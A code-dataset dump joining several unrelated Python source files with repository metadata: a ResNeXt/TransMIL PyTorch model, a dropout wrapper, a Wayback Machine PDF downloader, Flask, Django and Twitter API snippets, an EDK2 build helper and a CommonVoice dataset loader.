att0 = att0[:,:,0:(height*height)]
x0 = torch.sum(torch.mul(x,att0),2)
outputs.append(self.classifier[i](self.drop(x0)))
return outputs, outputs2
def resnext50_fg_car(pretrained=False, model_dir='', class_num=1, test=False, **kwargs):
if pretrained:
# model_dict = torch.load(model_dir)
model = resnext_car_multitask(resnext_model=model_dir, class_num=class_num, test=test, **kwargs)
params = torch.load(model_dir)
keys = params.keys()
keys1 = list(keys)
if not test:
print('load imagent model')
params.pop(keys1[-1])
params.pop(keys1[-2])
new_state_dict = OrderedDict()
for k,v in params.items():
name = 'resnext_car_multitask.'+k
new_state_dict[name] = v
state = model.state_dict()
state.update(new_state_dict)
model.load_state_dict(state)
else:
print('load test model')
new_state_dict = OrderedDict()
for k,v in params.items():
name = k[7:]
print(name)
new_state_dict[name] = v
state = model.state_dict()
state.update(new_state_dict)
model.load_state_dict(state)
else:
model = resnext_car_multitask(resnext_model=None, class_num=class_num, test=test, **kwargs)
return model
| [
"zhaoxiangyun915@gmail.com"
] | zhaoxiangyun915@gmail.com |
0904ea7fc406f810b0f0e92cd35e5f4c1d653eee | 2eec69f014b2111680904208e0a9bcb4f1c1e922 | /module/dropout_wrapper.py | d1e7a882eb2049a8e870f874e99ec7d9a57e57ec | [
"MIT"
] | permissive | UKPLab/mdl-stance-robustness | fc873d2ec95ee02866e03041123d8316bd677411 | a8ef3f498e7f238d5224debe9bfce478e480201f | refs/heads/master | 2023-07-19T21:51:14.086577 | 2022-05-17T12:55:18 | 2022-05-17T12:55:18 | 229,263,983 | 37 | 13 | MIT | 2023-07-06T21:36:14 | 2019-12-20T12:48:42 | Python | UTF-8 | Python | false | false | 1,102 | py | # Copyright (c) Microsoft. All rights reserved.
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
class DropoutWrapper(nn.Module):
"""
This is a dropout wrapper which supports the fix mask dropout
"""
def __init__(self, dropout_p=0, enable_vbp=True):
super(DropoutWrapper, self).__init__()
"""variational dropout means fix dropout mask
ref: https://discuss.pytorch.org/t/dropout-for-rnns/633/11
"""
self.enable_variational_dropout = enable_vbp
self.dropout_p = dropout_p
def forward(self, x):
"""
:param x: batch * len * input_size
"""
if self.training == False or self.dropout_p == 0:
return x
if len(x.size()) == 3:
mask = Variable(1.0 / (1-self.dropout_p) * torch.bernoulli((1-self.dropout_p) * (x.data.new(x.size(0), x.size(2)).zero_() + 1)), requires_grad=False)
return mask.unsqueeze(1).expand_as(x) * x
else:
return F.dropout(x, p=self.dropout_p, training=self.training)
| [
"schiller@ukp.informatik.tu-darmstadt.de"
] | schiller@ukp.informatik.tu-darmstadt.de |
194d93f9b8466fefd1d328db4121c16c65ee9dce | 94aa02baa8250861e457482ddcb6a214e57faaf1 | /waybackPDF.py | b4d75340f58b7d480b4f6fb0d7bc134b73e63ba0 | [] | no_license | atavacron/WaybackPDF | e7fff0784d10019269ec7df57e50c67b506147b2 | 8db212997c03b8f8c48d77558b9349e975c01ee7 | refs/heads/master | 2022-10-01T16:39:05.100250 | 2020-06-08T09:28:26 | 2020-06-08T09:28:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,996 | py | #!/usr/bin/env python3
# coding: utf-8
import json
import os
import re
import requests
import argparse
class PC:
"""PC (Print Color)
Used to generate some colorful, relevant, nicely formatted status messages.
"""
green = '\033[92m'
blue = '\033[94m'
orange = '\033[93m'
endc = '\033[0m'
ok_box = blue + '[*] ' + endc
note_box = green + '[+] ' + endc
warn_box = orange + '[!] ' + endc
def parse_arguments():
desc = ('OSINT tool to download archived PDF files from archive.org for'
' a given website.')
parser = argparse.ArgumentParser(description=desc)
parser.add_argument('-d', '--domain', type=str, action='store',
required=True,
help='The target domain you are looking for files')
parser.add_argument('-o', '--output', type=str, action='store',
required=False,
help='Optional output directory (Default is the domain name)')
parser.add_argument('--http', type=str, action='store',
required=False,
help='Use HTTP instead of HTTPS for the target domain.'
' The default behavior uses HTTPS')
args = parser.parse_args()
return args
def getPDFlist(domain, protocol):
print("\n" + PC.ok_box + "Requesting PDF list...")
# Default target is HTTPS
targetDomain = "https://{}".format(domain)
# Building URL
if protocol:
targetDomain = "http://{}".format(domain)
baseURL = "https://web.archive.org/web/timemap/"
payload = {'url':targetDomain, 'matchType':'prefix','collapse':'urlkey',
'output':'json', 'fl':'original,mimetype,timestamp,endtimestamp'
',groupcount,uniqcount', 'filter':'!statuscode:[45]..'
,'limit':'100000', '_':'1587473968806'}
# HTTP request to get PDF list
raw = requests.get(baseURL, params=payload).json()
# Building the PDF list
files = []
headers = raw[0]
for item in raw[1:]:
file = {}
for i, header in enumerate(headers):
file[headers[i]] = item[i]
files.append(file)
pdfs = []
for file in files:
if file['mimetype'] == 'application/pdf':
pdfs.append(file)
for pdf in pdfs:
# Create direct URL for each PDF
pdf['wayback'] = 'https://web.archive.org/web/' + pdf['timestamp'] + 'if_/' + pdf['original']
name = pdf['original'].rsplit('/',1)[1]
if ".pdf" in name:
name = name.rsplit(".", 1)
pdf['name'] = name[0] + '-' + pdf['timestamp'] + '.pdf'
print(PC.note_box + "{} PDFs found".format(len(pdfs)))
return pdfs
def downloadFiles(domain, pdfs, output):
# If needed, create directory
if not os.path.exists(output):
os.makedirs(output)
print("\n" + PC.ok_box + "Downloading Files...")
# Downloading and saving files
for p,pdf in enumerate(pdfs):
with open(output + '/' + pdf['name'],'wb') as file:
data = requests.get(pdf['wayback'])
file.write(data.content)
print(PC.note_box + "({}/{}) Saved {}".format(p+1, len(pdfs),pdf['name']))
def main():
"""Main Function"""
args = parse_arguments()
if args.output:
outputDir = args.output
else:
outputDir = args.domain
print("\n" + PC.note_box + "Web Archive PDF Downloader ")
print(PC.note_box + "Target domain : " + args.domain)
print(PC.note_box + "Output directory : {}/".format(outputDir))
#print(PC.note_box + "Output directory : {}/{}/".format(os.path.split(os.getcwd())[1],args.domain))
# Getting the PDF list
pdfList = getPDFlist(args.domain, args.http)
# Downloading PDF
downloadFiles(args.domain, pdfList, outputDir)
print("\n" + PC.ok_box + "Everything's done !")
print(PC.ok_box + "Happy analysis !\n")
if __name__ == "__main__":
main() | [
"haax@mdamail.ch"
] | haax@mdamail.ch |
518f828d05ed4b0ac679e36476365de455ed024e | 54fb337a7e86bdedd5a6ebad96efe451395d7226 | /main.py | a304cdd3e5d1d3258ac60f6c8a17881bd48baa1e | [] | no_license | jes67/flask-intro | d56e4544cfe7e953d147759cce4ec40869825e9c | 9d439e024d88db9c23c93d03ba3fa06ce34f8907 | refs/heads/master | 2021-08-18T04:29:33.704360 | 2020-03-12T18:46:36 | 2020-03-12T18:46:36 | 246,907,442 | 0 | 0 | null | 2021-03-20T03:02:41 | 2020-03-12T18:44:12 | HTML | UTF-8 | Python | false | false | 214 | py | from flask import Flask, render_template
from datetime import datetime
app = Flask(__name__)
@app.route("/about")
def about():
return render_template("about.html")
if __name__ == '__main__':
app.run()
| [
"jesusmlg16@gmail.com"
] | jesusmlg16@gmail.com |
0b27c96db7260b43fe3d2825059aa046f618a905 | 1dcb88c3fe76b372b1b74a1139720ab101ee26e3 | /queue.py | 8b6a114c91103f3682c4550e78a6cd43c637c764 | [
"Apache-2.0"
] | permissive | mitre/growthcleanr-web | e771cab7a74aadb196b7a9ef2a0f6333a7026acc | 1a495a11fb77605b5ef16c7e7d25644d39e59944 | refs/heads/main | 2023-08-23T03:15:27.383713 | 2021-07-09T22:31:20 | 2021-07-09T22:31:20 | 280,239,050 | 2 | 0 | Apache-2.0 | 2022-10-18T21:10:57 | 2020-07-16T19:20:41 | Jinja | UTF-8 | Python | false | false | 80 | py | from huey import SqliteHuey
huey_queue = SqliteHuey(filename="huey_queue.db")
| [
"dlchudnov@mitre.org"
] | dlchudnov@mitre.org |
80be48414788634625dc938448d454dd2db8ad4f | 45fef6ff83aaf11ca670e4eda965e455c3527a24 | /JSON-Pgm.py | d70368b0930857b5f7701064a7db07bdd317a896 | [] | no_license | Sowmya-1/Python-document | badb808c00fd8f3a8f92aa23376cd3cfc63776f4 | fca41bf471f5b82ed1f6a9c45a3957aa0e40e273 | refs/heads/master | 2021-01-11T15:42:41.311403 | 2017-02-22T08:01:56 | 2017-02-22T08:01:56 | 79,905,109 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 128 | py | import json
list=[1,2,3,4,5]
dic={'name':'sowmya','at':'asm','pack':['python','AJS','HTML']}
print json.dumps(dic,indent=4)
| [
"noreply@github.com"
] | noreply@github.com |
b76807ebb8bbbc27d5379ec7046e836931127ca8 | 56de20f6054038f8ea574962cf87ffb4db7d31ee | /api/migrations/0011_auto_20201231_0150.py | 71906673ad04da15d61417b00b46d9602c925f9b | [] | no_license | docker581/api_final_yatube | e5797cac4f3c1be7b79f8f6f9d4d14778a419fe4 | 2f7d29cc1630c8950be0cd654704cd2dc3844570 | refs/heads/master | 2023-05-30T16:19:15.323579 | 2021-06-23T23:51:11 | 2021-06-23T23:51:11 | 323,850,968 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 709 | py | # Generated by Django 3.1.4 on 2020-12-30 22:50
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('api', '0010_auto_20201230_2350'),
]
operations = [
migrations.RemoveConstraint(
model_name='follow',
name='unique_follow',
),
migrations.AlterField(
model_name='follow',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user', to=settings.AUTH_USER_MODEL),
),
]
| [
"denisd581@gmail.com"
] | denisd581@gmail.com |
8ee9314035840f81d9d7478010945151bda3a8df | 4e8249081379a1305b7ff91d5692167cb1484dd7 | /Hubb_ediff.py | 1bc622467332e00de13bf237ef91d8e5d2734da3 | [] | no_license | TIm097/Bachelorarbeit | 4e7cc264f2052c72542f4db3b77e2e86912c2483 | c75f8f117fc9dea39909f568ffe6e812e7ad063c | refs/heads/master | 2020-12-25T18:52:11.362052 | 2017-08-16T13:41:32 | 2017-08-16T13:41:32 | 93,999,748 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | import numpy as np
import matplotlib.pyplot as plt
U, dE = np.genfromtxt('Stationäre_Systeme/Hubb_Eig_Ergebn/Hubb_ediff.txt', unpack = 'True')
plt.plot(U,dE,color = (1,0.5,0),label = r'$\Delta E_{0 \to 2}$')
plt.legend(loc = 'best')
plt.xlim(0,15)
plt.ylim(0,1.4)
plt.xlabel(r'$U/J$')
plt.ylabel(r'$E/J$')
plt.tight_layout()
plt.grid()
plt.savefig('build/Hubb_ediff_plot.pdf')
| [
"timo.graesser@gmx.de"
] | timo.graesser@gmx.de |
1cb0796a2e4782fccd381c4b5ee34854cb4ee2ac | 20fa87e590e99b03ad210bc1e6bde8fe4c02f47d | /SocialNetworkHarvester/Collection/migrations/0008_auto_20181010_0522.py | 362759d3f3a81ea9f6f07c24d557902e4c9e3923 | [] | no_license | GRCP-Ulaval/Social-Network-Harvester | e5f30a165d77b2a095bd3f0fed90be38f8bc7760 | 141ad02e89d8e450e40b05c530ebf965a1ec30e5 | refs/heads/master | 2020-03-28T16:24:03.617256 | 2018-12-23T16:31:00 | 2018-12-23T16:31:00 | 148,690,734 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 526 | py | # Generated by Django 2.1.1 on 2018-10-10 05:22
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('Collection', '0007_auto_20181005_1716'),
]
operations = [
migrations.AlterField(
model_name='collectionitem',
name='collection',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='collection_items', to='Collection.Collection'),
),
]
| [
"scloutier@nexapp.ca"
] | scloutier@nexapp.ca |
34b0a3903fbab558986e74b115ebb5bf14cae7a3 | 7c857119fe1505b1d80d6e62969661c06dc1a2f4 | /BaseTools/Source/Python/GenFds/VerSection.py | 7280e80cb4ef7ce47524af2de67a3c2e84cf5a33 | [
"BSD-2-Clause"
] | permissive | CloverHackyColor/CloverBootloader | 7042ca7dd6b513d22be591a295e49071ae1482ee | 2711170df4f60b2ae5aa20add3e00f35cf57b7e5 | refs/heads/master | 2023-08-30T22:14:34.590134 | 2023-08-27T19:14:02 | 2023-08-27T19:14:02 | 205,810,121 | 4,734 | 770 | BSD-2-Clause | 2023-09-03T12:41:33 | 2019-09-02T08:22:14 | C | UTF-8 | Python | false | false | 2,917 | py | ## @file
# process Version section generation
#
# Copyright (c) 2007 - 2018, Intel Corporation. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
# Import Modules
#
from __future__ import absolute_import
from .Ffs import SectionSuffix
import Common.LongFilePathOs as os
from .GenFdsGlobalVariable import GenFdsGlobalVariable
from CommonDataClass.FdfClass import VerSectionClassObject
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.DataType import SUP_MODULE_SEC
## generate version section
#
#
class VerSection (VerSectionClassObject):
## The constructor
#
# @param self The object pointer
#
def __init__(self):
VerSectionClassObject.__init__(self)
## GenSection() method
#
# Generate version section
#
# @param self The object pointer
# @param OutputPath Where to place output file
# @param ModuleName Which module this section belongs to
# @param SecNum Index of section
# @param KeyStringList Filter for inputs of section generation
# @param FfsInf FfsInfStatement object that contains this section data
# @param Dict dictionary contains macro and its value
# @retval tuple (Generated file name, section alignment)
#
def GenSection(self, OutputPath, ModuleName, SecNum, KeyStringList, FfsInf=None, Dict=None, IsMakefile = False):
#
# Prepare the parameter of GenSection
#
if FfsInf:
self.Alignment = FfsInf.__ExtendMacro__(self.Alignment)
self.BuildNum = FfsInf.__ExtendMacro__(self.BuildNum)
self.StringData = FfsInf.__ExtendMacro__(self.StringData)
self.FileName = FfsInf.__ExtendMacro__(self.FileName)
OutputFile = os.path.join(OutputPath,
ModuleName + SUP_MODULE_SEC + SecNum + SectionSuffix.get('VERSION'))
OutputFile = os.path.normpath(OutputFile)
# Get String Data
StringData = ''
if self.StringData:
StringData = self.StringData
elif self.FileName:
if Dict is None:
Dict = {}
FileNameStr = GenFdsGlobalVariable.ReplaceWorkspaceMacro(self.FileName)
FileNameStr = GenFdsGlobalVariable.MacroExtend(FileNameStr, Dict)
FileObj = open(FileNameStr, 'r')
StringData = FileObj.read()
StringData = '"' + StringData + '"'
FileObj.close()
GenFdsGlobalVariable.GenerateSection(OutputFile, [], 'EFI_SECTION_VERSION',
Ver=StringData, BuildNumber=self.BuildNum, IsMakefile=IsMakefile)
OutputFileList = []
OutputFileList.append(OutputFile)
return OutputFileList, self.Alignment
| [
"isakov-sl@bk.ru"
] | isakov-sl@bk.ru |
e1dbaf7dcd094b4802420ad1fd6fd67bcb521207 | 1af63dfd09f641cabb1ab6f9ac04eabd564edcfd | /backend/apps/api/views.py | a79186bb61e5027b05e5191b467d2a559c9cfb78 | [
"MIT"
] | permissive | MAX-EINSTEIN/django-react-starter | 05409f561c4d6410712637d791453373a20b97fa | cba2d7381d27743f0b32d84f673d25d78751eae4 | refs/heads/main | 2023-06-05T22:49:56.289999 | 2021-06-18T23:18:10 | 2021-06-18T23:18:10 | 376,601,819 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 392 | py | from rest_framework import generics
from backend.apps.blog.models import Post
from .serializers import PostSerializer
class PostsListView(generics.ListCreateAPIView):
queryset = Post.published_posts_objects.all()
serializer_class = PostSerializer
class PostDetailView(generics.RetrieveUpdateDestroyAPIView):
queryset = Post.objects.all()
serializer_class = PostSerializer
| [
"maxeinstein.dev@gmail.com"
] | maxeinstein.dev@gmail.com |
b197dbe5eb039338439bb8c6b3e6fb20f0f80e18 | db1247a3999e3f22db025639d09a605082ded89d | /grid/urls.py | 4da7303e5324e7da6e0f39e3e8d1faa61df9ca6a | [
"MIT"
] | permissive | wise-team/hiveprojects.io | 1614deb0e4df5fe19cf62dbdb4d8d2741173c6b0 | 96e15a53f02c7327fe982a06b2dce56cd130e38c | refs/heads/master | 2022-12-12T18:44:35.221892 | 2020-03-27T21:50:03 | 2020-03-27T21:50:03 | 248,597,914 | 5 | 1 | MIT | 2022-11-22T01:59:55 | 2020-03-19T20:24:59 | Python | UTF-8 | Python | false | false | 2,093 | py | """grid url patterns"""
from django.conf.urls import url
from grid import views
from grid.views import (
add_feature,
add_grid,
add_grid_package,
add_new_grid_package,
ajax_grid_list,
delete_feature,
delete_grid_package,
edit_element,
edit_grid,
edit_feature,
grid_detail,
grids
)
urlpatterns = [
url(
regex='^add/$',
view=add_grid,
name='add_grid',
),
url(
regex='^(?P<slug>[-\w]+)/edit/$',
view=edit_grid,
name='edit_grid',
),
url(
regex='^element/(?P<feature_id>\d+)/(?P<package_id>\d+)/$',
view=edit_element,
name='edit_element',
),
url(
regex='^feature/add/(?P<grid_slug>[a-z0-9\-\_]+)/$',
view=add_feature,
name='add_feature',
),
url(
regex='^feature/(?P<id>\d+)/$',
view=edit_feature,
name='edit_feature',
),
url(
regex='^feature/(?P<id>\d+)/delete/$',
view=delete_feature,
name='delete_feature',
),
url(
regex='^package/(?P<id>\d+)/delete/$',
view=delete_grid_package,
name='delete_grid_package',
),
url(
regex='^(?P<grid_slug>[a-z0-9\-\_]+)/package/add/$',
view=add_grid_package,
name='add_grid_package',
),
url(
regex='^(?P<grid_slug>[a-z0-9\-\_]+)/package/add/new$',
view=add_new_grid_package,
name='add_new_grid_package',
),
url(
regex='^ajax_grid_list/$',
view=ajax_grid_list,
name='ajax_grid_list',
),
url(
regex='^$',
view=grids,
name='grids',
),
url(
regex='^g/(?P<slug>[-\w]+)/$',
view=grid_detail,
name='grid',
),
url(
regex='^g/(?P<slug>[-\w]+)/landscape/$',
view=views.grid_detail_landscape,
name='grid_landscape',
),
url(regex='^g/(?P<slug>[-\w]+)/timesheet/$',
view=views.grid_timesheet,
name='grid_timesheet'
)
]
| [
"noisy.pl@gmail.com"
] | noisy.pl@gmail.com |
b770f60b8ee7ddb0eb580e58766ac7eb067ca4d2 | cd3c8bf0a875c9393991df64b9eb15659e5093db | /data_retrieve.py | e0cd61eefd601bf2d12f53f98b191ba9345db4f5 | [] | no_license | william-hackett/cs1951a | 143c06040ce3daf8fb70e19f10c0df1811f575ae | 1af5d33cb0a0564d1302ab4ea6d2c80dba711ef9 | refs/heads/master | 2022-12-11T02:34:13.695662 | 2019-05-01T20:38:38 | 2019-05-01T20:38:38 | 171,779,192 | 0 | 0 | null | 2022-12-08T01:41:11 | 2019-02-21T01:38:39 | Python | UTF-8 | Python | false | false | 801 | py | import oauth2 as oauth
import json
with open('twitter_auth.json') as json_file:
data = json.load(json_file)
CONSUMER_KEY = data["CONSUMER-KEY"]
CONSUMER_SECRET = data["CONSUMER-SECRET"]
# Create your consumer with the proper key/secret.
consumer = oauth.Consumer(key=CONSUMER_KEY,
secret=CONSUMER_SECRET)
# Request token URL for Twitter.
# Trends for global, WOEID = 1 is global
request_token_url = "https://api.twitter.com/1.1/trends/place.json?id=2357536"
# Create our client.
client = oauth.Client(consumer)
# The OAuth Client request works just like httplib2 for the most part.
resp, content = client.request(request_token_url, "GET")
trend_data = json.loads(content)
t = trend_data[0]["trends"]
with open('data.json', 'w') as outfile:
json.dump(t, outfile)
print trend_data
| [
"tymani_ratchford@brown.edu"
] | tymani_ratchford@brown.edu |
c5ad1b5d232b6458e70b9d7459d2978fcf989724 | 1bde114a847c629701e3acd004be5788594e0ef1 | /Examples/PatternRefactoring/trashvisitor/Visitor.py | 29bc5089c2ffa37d3322ce93d7a97ca546f4a1f4 | [] | no_license | BruceEckel/ThinkingInPython | 0b234cad088ee144bb8511e1e7db9fd5bba78877 | 76a1310deaa51e02e9f83ab74520b8269aac6fff | refs/heads/master | 2022-02-21T23:01:40.544505 | 2022-02-08T22:26:52 | 2022-02-08T22:26:52 | 97,673,620 | 106 | 33 | null | 2022-02-08T22:26:53 | 2017-07-19T04:43:50 | Python | UTF-8 | Python | false | false | 215 | py | # PatternRefactoring/trashvisitor/Visitor.py
# The base class for visitors.
class Visitor:
def visit(self, Aluminum a)
def visit(self, Paper p)
def visit(self, Glass g)
def visit(self, Cardboard c)
| [
"mindviewinc@gmail.com"
] | mindviewinc@gmail.com |
d8efecb43d9198e3dd2221f4e39fb241646378fc | 0032d988541e85c47b5034c20ecf88220dde5a95 | /openbook_posts/migrations/0026_auto_20190414_1620.py | 242d6b7b2f6ad2429773288abeaee56f0fb9ccf8 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | OkunaOrg/okuna-api | eabd37fef9d2be59b590ed8d72bee084ac377997 | f87d8e80d2f182c01dbce68155ded0078ee707e4 | refs/heads/master | 2022-02-04T21:31:10.577601 | 2021-12-28T18:20:39 | 2021-12-28T18:20:39 | 151,052,951 | 185 | 92 | MIT | 2022-01-13T01:00:40 | 2018-10-01T07:44:46 | Python | UTF-8 | Python | false | false | 444 | py | # Generated by Django 2.2 on 2019-04-14 14:20
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('openbook_posts', '0025_post_is_edited'),
]
operations = [
migrations.AlterField(
model_name='post',
name='uuid',
field=models.UUIDField(db_index=True, default=uuid.uuid4, editable=False, unique=True),
),
]
| [
"joel@open-book.org"
] | joel@open-book.org |
cf50ca043b86bceb7361c9ed7fa07a000eb8beab | aee5c07c54d03417abbff170eb3f85adc0e3c60b | /torchaudio/datasets/commonvoice.py | 33250245c33321a003384484510c1fd57ec9b3b6 | [
"BSD-2-Clause"
] | permissive | astaff/audio | 118278012e49e86cfe6dcb91d5eeae84eb2941ca | 27a0f7653bc2918e314b4225782d2b29ef31ae4a | refs/heads/master | 2023-04-25T13:04:27.158545 | 2020-04-20T15:08:21 | 2020-04-20T15:08:21 | 257,380,879 | 0 | 0 | null | 2020-04-20T19:17:28 | 2020-04-20T19:17:27 | null | UTF-8 | Python | false | false | 4,177 | py | import os
from typing import List, Dict, Tuple
import torchaudio
from torchaudio.datasets.utils import download_url, extract_archive, unicode_csv_reader
from torch import Tensor
from torch.utils.data import Dataset
# Default TSV should be one of
# dev.tsv
# invalidated.tsv
# other.tsv
# test.tsv
# train.tsv
# validated.tsv
FOLDER_IN_ARCHIVE = "CommonVoice"
URL = "english"
VERSION = "cv-corpus-4-2019-12-10"
TSV = "train.tsv"
def load_commonvoice_item(line: List[str],
header: List[str],
path: str,
folder_audio: str) -> Tuple[Tensor, int, Dict[str, str]]:
# Each line as the following data:
# client_id, path, sentence, up_votes, down_votes, age, gender, accent
assert header[1] == "path"
fileid = line[1]
filename = os.path.join(path, folder_audio, fileid)
waveform, sample_rate = torchaudio.load(filename)
dic = dict(zip(header, line))
return waveform, sample_rate, dic
class COMMONVOICE(Dataset):
"""
Create a Dataset for CommonVoice. Each item is a tuple of the form:
(waveform, sample_rate, dictionary)
where dictionary is a dictionary built from the tsv file with the following keys:
client_id, path, sentence, up_votes, down_votes, age, gender, accent.
"""
_ext_txt = ".txt"
_ext_audio = ".mp3"
_folder_audio = "clips"
def __init__(self,
root: str,
tsv: str = TSV,
url: str = URL,
folder_in_archive: str = FOLDER_IN_ARCHIVE,
version: str = VERSION,
download: bool = False) -> None:
languages = {
"tatar": "tt",
"english": "en",
"german": "de",
"french": "fr",
"welsh": "cy",
"breton": "br",
"chuvash": "cv",
"turkish": "tr",
"kyrgyz": "ky",
"irish": "ga-IE",
"kabyle": "kab",
"catalan": "ca",
"taiwanese": "zh-TW",
"slovenian": "sl",
"italian": "it",
"dutch": "nl",
"hakha chin": "cnh",
"esperanto": "eo",
"estonian": "et",
"persian": "fa",
"portuguese": "pt",
"basque": "eu",
"spanish": "es",
"chinese": "zh-CN",
"mongolian": "mn",
"sakha": "sah",
"dhivehi": "dv",
"kinyarwanda": "rw",
"swedish": "sv-SE",
"russian": "ru",
"indonesian": "id",
"arabic": "ar",
"tamil": "ta",
"interlingua": "ia",
"latvian": "lv",
"japanese": "ja",
"votic": "vot",
"abkhaz": "ab",
"cantonese": "zh-HK",
"romansh sursilvan": "rm-sursilv"
}
if url in languages:
ext_archive = ".tar.gz"
language = languages[url]
base_url = "https://voice-prod-bundler-ee1969a6ce8178826482b88e843c335139bd3fb4.s3.amazonaws.com"
url = os.path.join(base_url, version, language + ext_archive)
basename = os.path.basename(url)
archive = os.path.join(root, basename)
basename = basename.rsplit(".", 2)[0]
folder_in_archive = os.path.join(folder_in_archive, version, basename)
self._path = os.path.join(root, folder_in_archive)
if download:
if not os.path.isdir(self._path):
if not os.path.isfile(archive):
download_url(url, root)
extract_archive(archive, self._path)
self._tsv = os.path.join(root, folder_in_archive, tsv)
with open(self._tsv, "r") as tsv:
walker = unicode_csv_reader(tsv, delimiter="\t")
self._header = next(walker)
self._walker = list(walker)
def __getitem__(self, n: int) -> Tuple[Tensor, int, Dict[str, str]]:
line = self._walker[n]
return load_commonvoice_item(line, self._header, self._path, self._folder_audio)
def __len__(self) -> int:
return len(self._walker)
| [
"noreply@github.com"
] | noreply@github.com |
cd0886446ab1841e4d9c0e355f95dc0da428673d | 4ccd6dba4fd5b38d2cd80836920f177969bc0216 | /model.py | 874155ad9f220becce242239770767b69a0dbe6c | [] | no_license | Ycblue/TransMIL | 37036eadf518efafb06dded29316406360f7d79e | e48481c35b66085fd897e7fb8fb5ede24d60c22f | refs/heads/main | 2023-08-29T06:02:56.932474 | 2021-10-28T13:56:04 | 2021-10-28T13:56:04 | 422,216,971 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,277 | py | import torch
import torch.nn as nn
from argparse import ArgumentParser
import numpy as np
from nystrom_attention import NystromAttention, Nystromformer # https://github.com/lucidrains/nystrom-attention
import torchvision.models as models
from torch.optim.optimizer import Optimizer
## Lookahead optimizer + CE Loss
class TransMIL(nn.Module):
def __init__(self, n_classes, n_channels=3):
super(TransMIL, self).__init__()
self.L = 512 # 512 node fully connected layer
self.D = 128 # 128 node attention layer
self.K = 1
self.sqrtN = 12 # size for squaring
self.n_classes = n_classes
self.n_channels = n_channels
resnet50 = models.resnet50(pretrained=True)
modules = list(resnet50.children())[:-3]
self.resnet_extractor = nn.Sequential(
*modules,
nn.AdaptiveAvgPool2d(1),
View((-1, 1024)),
nn.Linear(1024, self.L)
)
self.class_token = nn.Parameter(torch.zeros(1, 1, 512))
self.nystromer1 = Nystromformer(dim = self.L, depth=1)
self.nystromer2 = Nystromformer(dim = self.L, depth=1)
self.grp_conv1 = nn.Conv2d(512, 512, 3, padding=1)
self.grp_conv2 = nn.Conv2d(512, 512, 5, padding=2)
self.grp_conv3 = nn.Conv2d(512, 512, 7, padding=3)
self.ln = nn.LayerNorm(self.L)
if self.n_classes == 2:
self.fc = nn.Linear(self.L, 1)
else:
self.fc = nn.Linear(self.L, self.n_classes)
def forward(self, x):
x = x.squeeze(0)
if self.n_channels==1:
x = torch.cat((x,x,x), 1)
Hf = self.feature_extractor(x)
Hf = Hf.squeeze(1) #512 features
##################################################
# Squaring
####################################################
# ToDo: Testing
N = np.square(self.sqrtN)
while Hf.shape[0] != N:
if Hf.shape[0] > N: # some of our WSIs have more than N patches, but most have less
Hf = Hf[:N, :]
else:
d = N - Hf.shape[0]
missing = Hf[:d, :]
Hf = torch.cat((Hf, missing), 0)
Hf = Hf.squeeze().unsqueeze(0)
Hs = torch.cat((self.class_token, Hf), 1)
####################################################
# MSA
####################################################
Hs = self.nystromer1(Hs) + Hs
####################################################
# PPEG
####################################################
Hc, Hf = torch.split(Hs, [1,Hs.shape[1]-1], 1)
Hf = Hf.view(1, -1, self.sqrtN, self.sqrtN)
Hf1 = self.grp_conv1(Hf)
Hf2 = self.grp_conv2(Hf)
Hf3 = self.grp_conv3(Hf)
Hfs = Hf1 + Hf2 + Hf3
Hfs = Hfs.view(1, N, -1)
Hs = torch.cat((Hc, Hfs), 1)
####################################################
# MSA 2
####################################################
Hs = self.nystromer1(Hs) + Hs
####################################################
# MLP
####################################################
Hc, Hf = torch.split(Hs, [1,Hs.shape[1]-1], 1)
Hc = Hc.squeeze()
output = self.fc(self.ln(Hc))
Y_hat = torch.ge(output, 1/self.n_classes).float()
return output, Y_hat, Hc
def configure_optimizers(self):
lr = 2e-4
decay = 1e-5
optim = Lookahead(torch.optim.AdamW(self.parameters(), lr=lr, decay=decay))
return optim
# return torch.optim.Adam(self.parameters(), lr=self.lr)
class View(nn.Module):
def __init__(self, shape):
super().__init__()
self.shape = shape
def forward(self, input):
'''
Reshapes the input according to the shape saved in the view data structure.
'''
batch_size = input.size(0)
shape = (batch_size, *self.shape)
out = input.view(shape)
return out
class Lookahead(Optimizer):
r"""PyTorch implementation of the lookahead wrapper.
Lookahead Optimizer: https://arxiv.org/abs/1907.08610
"""
def __init__(self, optimizer, la_steps=5, la_alpha=0.8, pullback_momentum="none"):
"""optimizer: inner optimizer
la_steps (int): number of lookahead steps
la_alpha (float): linear interpolation factor. 1.0 recovers the inner optimizer.
pullback_momentum (str): change to inner optimizer momentum on interpolation update
"""
self.optimizer = optimizer
self._la_step = 0 # counter for inner optimizer
self.la_alpha = la_alpha
self._total_la_steps = la_steps
pullback_momentum = pullback_momentum.lower()
assert pullback_momentum in ["reset", "pullback", "none"]
self.pullback_momentum = pullback_momentum
self.state = defaultdict(dict)
# Cache the current optimizer parameters
for group in optimizer.param_groups:
for p in group['params']:
param_state = self.state[p]
param_state['cached_params'] = torch.zeros_like(p.data)
param_state['cached_params'].copy_(p.data)
if self.pullback_momentum == "pullback":
param_state['cached_mom'] = torch.zeros_like(p.data)
def __getstate__(self):
return {
'state': self.state,
'optimizer': self.optimizer,
'la_alpha': self.la_alpha,
'_la_step': self._la_step,
'_total_la_steps': self._total_la_steps,
'pullback_momentum': self.pullback_momentum
}
def zero_grad(self):
self.optimizer.zero_grad()
def get_la_step(self):
return self._la_step
def state_dict(self):
return self.optimizer.state_dict()
